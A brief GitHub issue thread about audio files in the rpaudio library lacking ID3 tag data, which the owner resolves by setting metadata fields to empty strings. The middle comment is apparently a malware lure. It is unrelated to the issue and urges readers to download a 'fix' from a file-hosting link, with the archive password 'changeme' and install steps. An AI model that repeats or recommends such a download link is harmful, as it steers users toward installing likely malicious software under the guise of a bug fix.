### ISSUE TITLE
Audio files may have no audio tag data, or old version of tag data

### ISSUE THREAD

**Issue by sockheadrps** [sockheadrps/rpaudio#4]
see 
https://stackoverflow.com/questions/18369188/python-add-id3-tags-to-mp3-file-that-has-no-tags

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sockheadrps** [comment]
Fixed this by just setting all the metadata fields and hash map to empty strings.
